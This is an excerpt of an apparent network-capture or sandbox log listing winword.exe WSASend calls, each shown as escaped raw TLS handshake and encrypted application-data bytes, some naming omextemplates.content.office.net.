498. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xfa\\xa2\\x00\\xdf\\xd91\\xc7\\xfah\\xb8ii\\xee\t,\r%\\xcd\\xfe\\x1bw\\x80\\xe3\\x13\\x8e\\x14\\x90\\xac\\xf9z5\\x9en\\xea\\xd2\\xc5\\xbd\\xa0\\x85\\xba\\xe0\\x93\\xf9^\\x89\\xf0\\xcd\\x06.\\xf5\\xb0\\x834\\x9c\\xacm\\x97\\xff\\x93k2\\xe7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000hcws\\x0f\\xc5\\x95\\xf1&\\xde\\xbe\\x06\\x05*\\x0ei\\xd7\\xeat\"\\x06\\xf1\\xb1\\xfcxow\\xe9b4$5\\xb2\\xc1u\\x10\\xd5\\xd6mv\\xba\\xf3\\xe1\\x16\\x98p@"
499.  
500.  
501. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x01\\xf9\\xcc\\xeai.\\xd1\\xf7\t\\xbd\\xc7\\xd9\\x82\\xdb\\xdf\"\\x80\\x9b\\xce\\x876\\xb6wp\\xf0y\\xa64\\xf5a\\xa7\\xea\\xb3n\\xd8e\\x1c\\x99\\xef\\x0f\\xa8x\\xa0\\xabr\\xcbw\\x9d\\xaf\\xa9\\x81\"a\\x95\\x19\\x0e\\xc0\\xd2\\x86\\x0e\\xf0i6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9b(\\x13\\xf4\\xca\\xa6\\x183\\xdf~w\\xd2\\x9a\\x16\\xecrl\\xa1c\\xef\\x9d0*\\xee\\xf2%\\x7fd\\x98\\xa3,no'\\x11=\\xa5\\xa5n\\x0f+\\x97\\xb5\\x14\\x9f\\x98x"
502.  
503.  
504. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04w\\xca\\x8f\\xecq\\xabu\\x11\\xb8\\xe8\\x08c\\xab\\x8d\\xe7p\\x7f\\x0c\\xb4\\xe9%|\\xe1\\x03\n4\\xcc*/\\x1c\\x839\\x0bhg\\oi\\xd4\\xcb\\xce\\x16\\xa3n\\xf9\\xbf\\xdd\\xca\\xeb_v@\\x16\\x0c\\x99\\xe6t\\x11\\xeb\\xb7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000|\\x16\\x10,i\\xc8\\xf07\\xe2\\xf45\\xc3oe\\xf1r\\xf1\\xbc\\xf6\\xcdoe<gm\\xf6\\x06\\x17j\\x15d\\x85\\x9e;|a\\xcb\\x9d\\x84/\\xb7o\\xf2\\x98)c\\x80"
505.  
506.  
507. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xea4\\xdb\\xd7\\xc9\\xf8\\x88\\xf6c\\xc5\\x1df1=\\x84\\xd5\\x87`\\xa4gw\\x8e\t\\xdb\\x0b\\xe7o\\xfb!\\xc2m\\x18t\\xc4v\\xc7h'j5\\xc4\t1ul\\x17\t<\\x8f\\xc9pa\\xbai\\xb2\\x96*\\xed\\xcb`\\x1f\"\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe4\\x8e\t\\xd0\\x9d\\xc1\\x11\\xf7@2f\\xb9\\x125_\\xc1\\xf1 \\x8ci\\xde\\x91\\xb6\\x85g\\x9b\\x87\\xd9\\xef\\xe8\\xecn\\x9a\\x15kz\\xec'\\xb8c\\xf1%$\\x1f\\x926h"
508.  
509.  
510. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xad\\xbfl\\xa7\\xc2\\x14\t\\xb3t\\xf7\\xf6\\xc2\\xa0\\x15\\xd6\\x8f3\\xba\\xbf\\xab\\xe0c\\xae\\x16\\x94\\x1a,\\xa5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
511.  
512.  
513. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xba~\\xfc\\x1a\\xf7\\x0c\\x95w\\x1ba\\x18r\\x8c\\x99\\x0e~l<\\x10\\x07r\\x86\\x8b`\\x8d\\xeb\\xd0-\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
514.  
515.  
516. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xd2\\x9f\\xb4\\x9edvlbr\\x18\\xb5t\\xad\\xc8b\\x9a$z\\xe4\\xa8\\xb3\\xf8\\xd2d\\x91\\xdf#\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
517.  
518.  
519. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010k\\x19:g:\\xe2r`\\xec\\x17\\xf3\\xeczvgc\\x8c#\\x95i\\x7f\\xe8\\xbb*+9w\\xde\\xc9\\xda\\xc4\\xbf\\xc7\\xdbw6%@.\\xeb\\xa7\\xf9\\x0f\\xe6\\x01t\\xee\\xf2\\xa8y>\\xbf/'*\\xb2g\\x03@31\\x00\\xd0\\x19wy`\\x84x\\x18\\x14\\xcb\\xb9\\x97\\xe82\\xd4r\\x0e\\xe1\\xfd\\x9a\\xc1\\xf0du7\\x8b\\x10`l\\x0e\\x03\\x18y\\x96\\xf0.\\x16\\xe2\\xb8\\xdex\\xd8v\\x80\\x97\\xe1n\\xf0\\x9d\\xa2\\xd2j\rqyv\\x19vc\\xc1u#m\\x95,$\\xbd\\xc0\\xd6\\xfa\\xb5\\xe2\\xf0t\\x84\\x8b\\x8a*\\x95\\xb5a\\xd7k\\xa5\\xa1~\\x17;h\\x95\\xc6\\xa2c\\x91\\xef\\x16\\xa2il\\xa6l\\xb7w \\\\xb1i\\xad\\xac~\\x80\\x8b\\xaa\\xd7\\xc7-p\\xd8:ee8\\xf2\n\\xf3\\x90\\x92\\xdc\\xe2;x^\n>\\xb8\\x19\\xdb\\xa4e60\\xcd\\xe0\\x84d\\x8f\\xde\\xec\\xdch\\x1c\\xd1\\x80l?\\x04,g\\x0b\\x89\\x15+\\x08\\xdcc\\xf1\\x91r\\xcc\\x95n\\x18td\\xaf)3<\\x85\\xd8\\xac\\xcb|\\xab\\x1c\\x9b\\xb9"
520.  
521.  
522. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xf5\\x94\\xdc\\x845u\\xe9&\\xc2\\x01t\\xbd\\xfa\\x10\\xe5w\\xa8\\x8cd%6\\x05jh$v\\x1e\\xcc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
523.  
524.  
525. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x84di\\xaa \\xb5i\\x82\\xe1\\xa3\\x91\\xd0\\x9c\\xecv\\xf8e\\xb6\\x9c\\xfdh\\x87\\xcb\\xceu\\xd8-\\xf2\\x14\\xaa\\x97\\x85\\xd5~@\\xfe\\x0c\\xb0z\\xe4f '\\x1e\\xb3=!.\\x17\\xef\\x02bxz\\xea.\\xefuny\\xfdwj\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa9_\\x14\\xf2z\\xf3\\\\xeb\\xdf\\x8be\\xa6b@g\\xd6\\x9d\\x99\\xb1\\xc8\\xa6\\x0e8\\xb3\\xe7\\x06\\xd2lr\\xbf\\xb6\\x02\\xeau\\xe0;!\\xe33\\x87d\\x90\\xbc4\\x17\\xfa"
526.  
527.  
528. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xfb<\\xa8\\x88j'\\xec\\xb2\\xb4\\x86^i\\x07l\\xf9\n\\x04s\\xaa\\x96*\\xd6\\xe5(\\x7f\\xa0\\xbd\\xe5\\xe6\\xc6ze\\x90b\\x83\\x88\\xf8\\xaba\\x91\\xc8\\xf5\\x8eu fc\\xf6\\xaa\\x96\\xd5\\xd4\\xfe\\xca\\xcf\\x1cp\"x\\x9b\\xb3\\x08\\xec\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000h\\xa5\\xd7\"~-\\xd1\\x9cw\\xda\\xca\\x9e\\xb0\\x8f\\x17o\\xfd\\xeb\\x8dw\\xf1p\\xef?\\xa5z\\x86=\\xfa\\xec\\xc5\\xe1\\x7f\\xc0\\xac\\xe6\\x07\\x05\\x7f\\xa8\\x01\rs\\x10\\xb2\\xc2"
529.  
530.  
531. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04b\\x97\\xeae;y\\xec\\x1at\\xba\\xb6\\x81\\xe3\\x83\\xaau=e\\x85\\x0e\\x97\\x1b\\x93\\xefcj\\xdbb\\xce\\x8a8\\xb8pg\\xe2\\xf6\\x1c\n\\xec0\\xd8\r\\xf9\\xb6\\xfd\\xb8\\x83\\xb1@\\xab\\xdb\\xa8\\xabj\\xb3h\\x99\\x8cl\\x8cq\\x86\\xff*\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000(y\\xe5\\\\xfb\\xc4\\xb0v=\\xa9\\xa8\\x0c\\xef2\\x822\\x1f\\xd7\\xa9\\xfam\\xec\\xbb\\x02\\xa56\\xef\\xcc\\x18\\xe8.\\xdd7\\x9d\\xe1\\xc4\\xc9e\\xfe\\xf2\\xdc\\x0c\t7\\xe5\\xe18"
532.  
533.  
534. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf7#\\xa3\\x0e\\x8c\\xa44\\x87\\xa65\\x8ffg\\x8b\\x9a\\xd9j\\x95\\x90\\xa8z\\x7f\\xf7\\xfa\\xe5\\x0eu\\xac\\xa7\\xd3\\xd1\\xf0\\xf4o\\xea\\x1e\\xd8\\xf6k\"\\xde\\xe5\\xc2\\x1f\\xb7\\xa2\\xe1g\\x03\\x11=\\x9a\\x0frz\nm4\\x8b\\xe78\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd4^!%o\\xa8\\x88m\\xb9\\xc9\\xa6\\x9e\\x99o\\xc7w\\xcd%\\xe2(\\xddd\\xf1\\x11\\x94\\xc4e\\x12n\\xf2?\\xc4id\\x81\\xab\\xc7&f\\x04,\\xc2:\\xd6\\xf3\\xfb\\x07"
535.  
536.  
537. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x0c\\xf1\\xba\\x11\\xc5\\xa4a\\xad\\xe3\\xd0\\xb6\\xb9\\xf0|\\x14\\x97\\xfd\\xfcv\\xbcvi!\\xd0,2\\x99\\x1d\\xdc 5\\xb1\\xe4q\\xed\\xb3\\xd7\\x87\\xcb\\x8c\\xfd\\x1eedz\\xab3\\xdd\\xaf\\xea\\xd7\\x01\\xac%\\x05\\xbc5\\xf78\\xea)m\\xe8-\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\r\\x82\\xea\\x97<\\\\xcd\\x06\\x1f<\\xd0\\xa0\\x1c\\x00?\\xdf\\xbb\\xc1\\x1a_\\x94\\x87xy\\xc2(f\\xa5\\xd3*\\xa1\\xc4\\xca\n!/\\xf0\\x15&\\xe9p\\x17\\xect(\\x9a\\xacx"
538.  
539.  
540. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x94l\\xbf\\x10\\xfa\\x99mq\\x9e\\xe1ez@\\xb1\\x88\\x93\\xc3\\xa8z\\x86\\x8f\"\\xa48;\\xc0ol\\x9e\\xae\\xa3\\xd1\\x0b\\xa5\\x06\\x8c\\x13\\xbc\\x8f\\xdap\\xa2`\\xa9cr\\xa1\\xa6\\xed\\x98/t;,4\r\\x8dpk+\\xa3o\\xc6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000s\\xe0\\x90\\x18\\x8b\\xe6\\xf7\\x80\\x1ct\\x821\\x10g\\x90?\\xe9\\xe3\\x90ac\\xc2.\\xc7\\xba\\xd1\\xb7\\xebmx\\x9b\\x85\\xf2\\x9a\\xfb\\x1dk\\xf0f\\xa0f\\xff\\xf9\\x96\\x9a\\xc8v"
541.  
542.  
543. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe9c\\xedyx\\xcd\\x13\t6\\xd2\\xd5\\x81\\xae\\xf8\\xea(\\xd0\\xde\\xfe\\x9c\\x95x\\x03d\\xc5\\\\x17>\\x1am\\x12q\\xe1\\x9b!h\\xa4`\\xd9\\x14\\x9e\\x19>p\\xe5\\xdf\\xa5\\xf6\\x9a\\xe0\\x923'i7r\\xee~\\xde%\\x91\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000n\\xb0\\xf6\\xbc\\xbd\\xe2d'\\xf4\\x8c\\x1b\\x16\\xe5\\xe3\\x14\\xef\\xa2\\xaa6\\xa2-\\xd5/\\x82\\x9b\\xd6u\\x0e\\x9d\\x8d\\xed\\xf6\\x8c\\x88\\xd8\\xddye\\xfe_ti\\x94\\x01y\\x86\\x01"
544.  
545.  
546. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa0t\\x1f\\x82\\xc3\\x8f\\xeao\\x85\\xac\\x90\\xa4\\xffw\\xd6\\xed\\xd5\\x07\"\\xfe\\x1c\\x84x\\xd8\\xb3\\x0ex\\xfc\\x13\\x1ex\\x9b\\xae\\xda\\x11\\xe1#\\x17e\\xf8\\x1bk\\x13\\x18(-u\\xbf\\x10\\x98\\xf6\\xab\\xcc\\xae\\xcd'\\xcc3\\x89\r7'\\x08\\xd9\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xbcbz\\xe4:\\x96\\xb6\\x1b\\xc6\\xaf\\xef\\xc4vn\\x8d\\xa8\\xc5,(\tk&\\xdc\\x04rntk\\xc5\\xddt\\xdb\\x90\\x0f\\xa8zff\"\\x068p\\x00\\xd1\\xb5\\xa2"
547.  
548.  
549. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9e\\x86\\xbf\\xc5\\x9e\\xf0\\xd6\\x1d\\x80\\xc3\\x0c\\xa6:\\xc7\\xca\\x7f\\xa03\\xd0\\x9d\\xe6`\\x14\\xe0\\x03\\xbe\n\\xe5\\x12\\xafx\\xad\\x0eke\\xc0o\\xfd\\xaeb\\x08+\\x89u'\\x8f)\\x98im\\xc9_z\\x9an\"t\\x98x\\xbb\\xa7\\xd7\\xe8\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x04\\xff\\xbc \\x8a\\x8fo\\x9e\\xca\\xda\\xd4\\x86\\xfbe\\\\x16\\xbd2\\xeba'0\\xae\na\\xd3\\x0b\\x92z\\xa2l\\x8b\\x0b\\x89\\x86\\xf0\\x9f\\xbd\\x8d\\x9b\\x80\\x00\\x8f\\xf9\\xdb+s!"
550.  
551.  
552. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd4x\\xd7a\\x0b\\x82e\\xcd\\x12\\xdb\\x033\\xf7\\xf8'\\x90\\xf7\\xbad\\x93b\\xd6\\x11q'\\xdf\\x196\\x82\\xed\\xce#m\\x9c\\xc7\\x87\\xe5k\\x1a\\xb9v\\x99\\xd7\\xd5\\xe4\"\\xb2\\x90`\n-\\xd2/\\xee?kp\\x850\\xe1\\xa9r\\x9a\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xca\\xc1\\x80\\x15>\\xc1\\x80\\xf6\\xc1c?e\\xb2p\\xc3/p \\x8a\\xa9)\\xba\\x016\\xbd\\xba\\x89\\xa9\\x9dh\\xaaqy\\x1d2?\\xff\\x00\\x8c\\xc7\\x0c\\x1e\\x07\\xbe\\x80\\xba\\xa6"
553.  
554.  
555. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04/\\x92\\xe9\\xdf\\xa5u\\x9e\\xf2p\t\\x0ce\\xb8\\xb0\\xf9\\x82p\\xd2\\x92,\\xca\\xa6\\x02\\xad5vb\\xdco\\x8a\\xee\\xe1\\xf6\\xb6:\\x98\\x8a\\xdbc\\x06xs\\x9e6\\xe9\\xa5\\xddah\\x87e\\xcb\\x8a\\xf4\\xcdw\\xdf\\x8d\\x94\\x8f\\x07\\xc6^\\x18\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000-\\xff\\xf9\\xef\\xafe\\xc293<\r\\xc1s6\\x91\\x9f\\xde\\xdd\\xa0p\\x9b:-\\xf1\\x88\\xb1\\x1f(dc\\xfb\\x04+n\\xbe\\xd8\\x8a\\xfd\\xbc\\xf0\\xed\\x13'\\x05d\\x95"
556.  
557.  
558. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc1k6\\x03\\xc4\\x91\\xc2\\x18\\xe8\\xad\\x93kg\\x02z\\xd3\\x94\\x94\\xe5@\\x8f\\xafm\\x87\\xa1\\x1b\\xb0\\xd7\\xa5g\\xce\\xe4uc\\x8dn&\\x01\\xfd\\xf7q)\\x8ad/\\xf5\\xb0\\x16\\x9fxc\\xd86k\\xf7q\\x84a\\xa6\\xb0 \\xc7o\\x16\\x82*\\xf3\\xf8_\\xbdc\\xdf\\xde\\x8a2\\x9d\\xd7r\\xf2~\\x8c\\xd3^v\\x03\\xd9\\xde9t\\x9a\\x88\\x95/\\x928\\x99\\xec\\\\x97\\x96\\x85\\\\xac\\xc2j\\xee\\xe8h\\xac\\xd71\\x89\\x88o\\x91\\xd5\\x81~\\x00\\x1da\\x86\\x80\\x11\\xe7\\xd7\\xd2\\x1a\\xea\\xd3m\r\\xf9>\\x14t\\xb3\\x11 \\x1c\\xbcb\\xffx\\xcaa\\xa3k\\x9cto\\xe4\\xbe\\x96\\xf0k\\x00\\xfex\\xf1\\xd1o\\xdfm\\xa9\\xce\\xa4\\xd7\\xea\\x80ks&\\xb1w\\x0c\\xe8\\xd9\\x0c\\x87\\x82\\xd4\\x05f\\xdch\\x17\\xa0\\xaa\\xca4a\\x13\\xc5\\xc7\\xd5\\xb8,5\\xb2\\xc4t\\xb8\\xdf\\xfe\\x9f\\xf5\\xf2t\nxk\\x1e\\xeb\\xc0\\xff\\x0f\\\\xca\\xe0\\x9b\\xc7\\xb2\\xab\\xdb\\x89\\xfdp4\\xf2;kbpz\\x18,\\x8fu\\x0b\\x82\\x94h\\xc8\\xa4\\xe5r"
559.  
560.  
561. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0109h\\xd01\\x19\\xae\\xad*\\x86\\xdd\\xdd.\\x93\\xca\\x15\\xc8y\\xc4\\x9bd\\xbb\\xc2\\x97\\xd8\\x03\\x86\\xa9\\x8a8\\xb3!k\\xcf9\\x1cl\\xb0b\\x86\\xe7q7\\xecf\\x98n\\xb3\\x02\\xd0\\xa8!\\xdd\\xe4\\xca^\\xa6\nq7v\\xa8>/\\xec(\\x9f\\xf99\\xc8m\\xcbu\\xf0\\xcd\\xa3\\xf0\\x9f\\xe4\\x15\\x13\\x8ejo_\\xa0\\xb0>\\x8dh\\x95\\xc8&\\xd1\\x01\\x8b\\xa1\\x03o\\xf8\\xf6\\xf3i\\x87\\x8d\\xf3:\\x9d\\x12c\\x89\\xad+t+\\x11\\xa9xb\\xe7\\xdd^\\xd8\\xdee`\\xc3\\xcf\\x95\\x0c?\\xc4\\xf2\\x04\\\\x9a\\xb8y0\\xca\\xde\\x15\\xe4x\\x11\\x00\\x0482i\\x03\\xde|nz\\x7f\\xe5\\xc3\\xaa\\x94b\\xdf\\x08b\\xa8g\\x19\\xa4\\x88'w7\\xb49i\\x1cu\\xf5\\x88rcl\\x98k*\\x11\\xce\\xd2\\xfcd\\xc7\\x1f\\x9a\\xa7q!\\xf7\\xca\\d\\xf1\\x06wm&\\xa5h#\\xe6\\xe8\\x18|\\xe0\\xee\\xc8\\x1c\\xf5i!x\\xfd\\x86ki\\\\xc5vl\\x90d\\x97\\xf0>w%m\\xce\\xd2\\xa6\\x96\\xeb\\xa6\\xbc\\x90\\xeb"
562.  
563.  
564. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x16\\x90\\xc7\\x07\"l\\x80\\x075hm\\xc1\\x90\\xe3\t\\xc8\n`\\xd9\\x00u\\xb8\\xcf\\xb0x\\xcal/\\xa5\\xc5\\x9b6+\\xce\\x80\\x01\\x80\\x07\\x93\\x07j\\x94\\xd7\\xeb1\\xd3\\x86\\xbe\\xc0\\xab\\xad\\xbf\\xd7\\xa867\\xe8:z|\\xabdv\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000z\\xed\\xce\\x90\\x06\\xbd\\xf6?4\\xf46\\xfa\\\\xbcn\\xcf\\x8e\\xfc\\xc4\\x0e\\x1f+b\\xfeq\\xfarjar\\x00k#.\\x91d6\"p<)^\\xb5\\x1d\\x0f)\\x0b\\xa5"
565.  
566.  
567. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x8e\\xefe\\x12\\xcaq\\xa7\\x04\\xb2\\x05\\xbe\na\\x13w\\x81\\xd6d\\x94#\\x89@:\rm\\x18\\xa7\\xd3\\x08z:\\xfah\\x07e\\xda\\x1fl\\xcb\\xb5\\xbb\\xe8vq\\xbc\\x92\\xef\\xa6i\\xc3v>ki\\x92=*vj\\x13w,\\xc8\\xd4\\xddl\\xea\\xc4\\xc5\\x01\\xa7\\x96\\xd2\\xc7\\x89ww\\xba\\xbf\\xc2\\x9f\\xf5y\\xf3\\xf7\\x81r\\x90s\\xc2\\x17\\xf4=h\\xaa\\xe9\\xf1\\xe2-\\x08\\xa7\\xb0\\x97\\x1b\\xb87=\rp\\xe0\\x1au\\x86\\x02\\xc3\\xa3r\\x86\\x87\\x8d\\x18:\\xa9\\x03\\xeal\\xadjb\\xa1iy\\x05t\\xc6&-\\x9a\\xd2\\x90\\x97e\t\\x9f\\xc1\\xbb\\x12\\xabdx?\\xbf\\xe2\\xeak\\x01\\xb7\\xef\\x1c\\xadz\\xcc+@\\xfb\\xe0\\xa9i\\xdag8\\xc4\\x8fh1\\xf1|\\xd1\\xe9x\\x11\\xe5\\x19\\x11\\xb0\\xdd/\\xb0\\x81\\xb7c\\x08\\xd4\\xbc@\\xd907\\x07j\\x00\\x18vl\\x1c\\x93\\xce\\xc9\\x18^)5\\x91c\\x00d\\xea\\xfe4\\x8e\\xe6\\xd0\\xf4+\\xcb\\xe9`\\xa2\\x88ge\\x8a\\x80l\\x94r.\\xf9\\xb8\\xfe\\xa0\\xb2)z\\x05\\xa7xy\\xf2j5"
568.  
569.  
570. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa3\\xec\\xe99\\xbf:\\xbeq\\xbbx\\xe6\\xebdh\\xb9`\\xad\\xad\\x9b7e\\xdb;\\xc6\\xf3\\x06\\xa2,.\\x8co\\xfdh\\x13)\\xe6g\n\\xc0*q3l\\xd1\\x0c\\xfe\\x14\\xa9\\x05\\xca\\xca\\xb4\\xbc\\xd0\\x93\\x04+\\xec$z\\xb0\\xd6\\xean\\xd5v\\xa6\\xfa\\xd6\\xe1\\xce\\xb6o\\xe0\\xe7i\\xb1/bi*\\xa1\\xb7#\\xba\\xd2\\xb9\\xfc\\xed\\xbamt\\xf9\\x8b\\xe3\\xc3f\\xbe\\xb0k\\xe7\r\\x10p h\\xa9f\\x03\\x81\\x91\\xe6\\xde\\x98\\x9b\\x8di\\x04\\x18!\\x1f\\x8eh\\xee\\x86\\xd8\\xe0\\xa4\\xd47m\\xa8\\xde\\xe08m\\x94x\\xc2\\xcb)l\\xe5\\x1da\\xca5\\xf1\\x8e\\xa2~q\\x8e\\x85m*\\xc5;\\xab\\xf1\\x85\\xc9dc\\x18a\\xaby\\x88\\xfcu\\x89\\xee\\x1ah\\x1d\\xf8\\xd3\\xd5p\\xd0\\xb5\\x1fbwp\\x90\\xd2\\xbadz\\xcf4d\\x1a\\xc6v\\xdc\\x16 \r\\x0e\\x9b\\xa3\\x89|\\xa3\\xaa\\xab\n\\xc8\\x89\\xe5\\\\xc1ys\\x87\\x1a\\x9f\\xf8=\\xb8$\\xcd\\x91\\x86\\x07y\\xc8\\xa4\\x04v\\xc0\\xd5\\xccsg\\x13t\\xf6y\\xeb"
571.  
572.  
573. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x8f\\xad\\x01\\x0c\\xce\\xd2\\xb1\\xb0\\x82\\x8a\\xc9\\xe2\\xf2\\x1a(`\\xc1\\xad\\x84\\xbei\\xf4\\xe8\\xca<\\xed\\xfdn\\x87kq\\\\xf4\\x90\\xbf\\xf2\\x05e\\x93yv\\xc2\\xcf\\xa0\\x9c\\x15\\xa0\\x9b4z\\x04\\xdb\\xc4ha\\x00gt\\x15\\x9b\\xc3c\\x8d\\x96\t\\xdf\\xa7n\\xca\\xc6\\xce=\\x0b;\\x8ehr\\xec;\\xa6(\\xeb\\x84z\\xff\\x95\n+h\\x07\t\\x91\\xf2\\xc21\\xef\"5=\\x1b\\x13\\xdb4\\xe2\\xe5\\x88q\\x11f\\xf0w\\x0bh\\x98\\xc2\\xe4\\xdb=\\xe4w\\xc48\\x97\\x1e\\xaas4\\x12\\xbf+\\xee\\x7f\\xb6\\xdam\\xe4hz\\xb7\\x13\\xd3\\xbai\\xbad\\xea2\\xdbwd\\xdb\\xce\\xf0\\xac\\xdc\\xf5\\xf5\\xb8\\xa6\\xa9\\x06u\\xce\\x7fgk)\\x18\\x9avc\\x1b\\xe0\\xf5e\\x92\\xcaueu7\\xc9:\\x8c9u\\xa4\\x16?8z\\xc7\\x02\\x9bon\\xecw\\x9a\\xbe\\x9a'\\xab\\xcf \\xeb\\xc0`\\xd0\\xa3d\\x9e\\xd6e>\\xd1b\nv-\\xdd\\x92\\xa5\\xfbj\\x92\\x90\\xbb\\xe2\\x0esh\\x8e:6\\xf3`\\x81\\x81l)\\xa5\\xb1\\x19j\\xe1"
574.  
575.  
576. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010a\\x14\\x88\\x8d$\tyq4\\x10`\\xf6\\x9540q\\xca\\xb9\\xb7;\\xa5\\xa3n\\xca\\xe8\\xf8\\xcb\\xeaq\\x00^\\xae\\x19\\x0b\\x19\\xd6\\xe7\\x13\\x97\\xc0hk_>j\\xa1_\\x821*\\x9b\\xc2@\\xb7\\xbf\\xfd\\xaa\\xfe(\\x8d\\xbf\\xda\\xb9\\x82z\\x9f\\x05\\x08+\\xe5\\x9bv\\x97\\x83\\x19\\x8f\\xe9~\\xb5\\xa6\\xa4\\xec\\x1e'\\x98+\\x88=\\x80xt9\\xc1\\xcci\\xb3\\xde\\x91\\xb0\\x98\\xfb\\xa3\\xc1\\x9a\\xcd\\x0b\\xa6\\xe6\\x03\\xf9\\xaf\\xc0\\xeb\\xf8\\x97\t\\x12$\\xc6wm\\xab_\\x07vxs\\x00\\xc7f\\xfb\\x1a\\x18\\xcc\\xedn\\x97\\xcf/)b\\xc9\\xbfg\\xc6 \\xd6v\\xfb1\\x02\\x1e^~.x\\xafz\\xed\\xfby\\x9e\\xe1cpa\\x17qd\\x7f\\xf0v8b\\x85e\\xe3\\xbf\\xd9\\xcaa\\x03h\\x9f\\xd5\\xc1\\xf5s\\x0e\\xc9#|\\xec\\x85t\\xd7\\x1e\\x04\\xed\\x18:+\\x9f\\xae\\x00\\xab\\x00d\\xcd\\xc8\\x9fk\\xcde9\\xb6\\xf3\\x1a>\\x12\\xb7,\\x00\\x1f~\\x84&\\xfax\\xca\\xeaufc\\xb1`+k\\xf5\\xd6\\x8b\\xb3\\xb7\\xd0\\xd2"
577.  
578.  
